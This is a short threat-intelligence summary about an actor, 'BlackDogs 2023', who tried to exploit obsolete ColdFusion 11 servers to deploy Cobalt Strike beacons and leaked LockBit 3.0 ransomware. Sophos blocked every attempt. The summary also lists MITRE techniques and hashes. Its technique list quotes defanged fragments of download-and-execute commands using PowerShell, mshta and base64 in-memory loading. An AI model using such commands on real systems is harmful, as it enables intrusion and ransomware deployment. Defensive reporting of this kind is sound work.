Threat actors targeted obsolete ColdFusion 11 servers to gain access and pivot to deploying ransomware, using leaked LockBit 3.0 code, but Sophos blocked all attempts on a customer network. The activity ties to a threat actor calling itself BlackDogs 2023, who repeatedly attempted PowerShell, certutil, and HTA delivery vectors to deploy a Cobalt Strike beacon but failed each time.
Keypoints
- Threat actors exploited unpatched ColdFusion 11 servers to gain initial access and pivot within the network, with no successful deployments observed.
- Payloads under consideration included Cobalt Strike beacons, ransomware (linked to leaked LockBit 3.0 code), fileless PowerShell backdoors, miners, and webshells.
- Sophos endpoint detections blocked every attempt, including LoLBIN process initiations and beacon deployments.
- Telemetry linked the activity to a single actor/group using the alias “BlackDogs 2023,” who left artifacts in a repository hosting their tools and payloads.
- The attackers used multiple delivery methods (PowerShell, certutil, HTA, and command-line scripts) and tested connectivity to remote domains (oastify subdomains) to gauge exploit viability.
- The operation underscores the risk of running old, unsupported software (ColdFusion 11) and the need for network isolation and credential restrictions on exposed servers.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Attacker attempted to leverage vulnerabilities in obsolete ColdFusion 11 to access Windows servers; “to test whether they could exploit the server further with a series of command-line entries leveraged the ColdFusion Server processes.”
- [T1059.001] PowerShell – Remote PowerShell script to download and deploy a Cobalt Strike beacon; “powershell -nop -exec bypass -c …”
- [T1105] Ingress Tool Transfer – Downloading and executing payloads via web requests (e.g., “downloadstring(‘hxxp://:64/watchdogs.ps1’)”).
- [T1218.005] Mshta – Using HTA to initiate PowerShell and download payloads; “mshta hxxp://:64/evil.hta”
- [T1059.003] Windows Command Shell – Repeated use of cmd /c commands to test connectivity and deploy payloads; “cmd /c …” statements
- [T1027] Obfuscated/Compressed Files and Information – Attempting to load and execute encoded payloads in memory (e.g., “FromBase64String” payloads).
- [T1071.001] Web Protocols – Cobalt Strike beacon communication and related C2 activity over web protocols (noted as C2_10a in telemetry).
Indicators of Compromise
- [Domain] Telemetry-related domains – oastify.com and several subdomains used for testing remote connectivity (e.g., mc2a1coghq275g3y1qhnp5u2otukid62.oastify.com, oh9c6etims79ai806smpu7z4tvzmnhb6.oastify.com)
- [Hash] Watchdogs.ps1 – a77fd996290cb37b7368f0b54774d8977c97fb7c
- [Hash] Invoke-powershelltcp.ps1 – 6be4f82c2f5dc46ebfa74a77fb550448fcac12d5
- [Hash] OftenExcute.ps1 – b2d5c047e60b2a183d30ac92b1dc73ac5ba58bbe
- [Hash] Memorystream payload (base64-in-memory load) – 48c62e2b8e99ba7ebdaa50da7b84de014122f8eb
- [Hash] ftps.exe – c2e896570e194ee4003f9e696a97c04b64a6e14e
- [Hash] LKl23s.exe – 759b9d1ea843596ab32ad401ffa1c9d09e735b56
- [Hash] Ww3wb.exe – a543ea56ecc63ec35e925e79d7c51558557b3ed1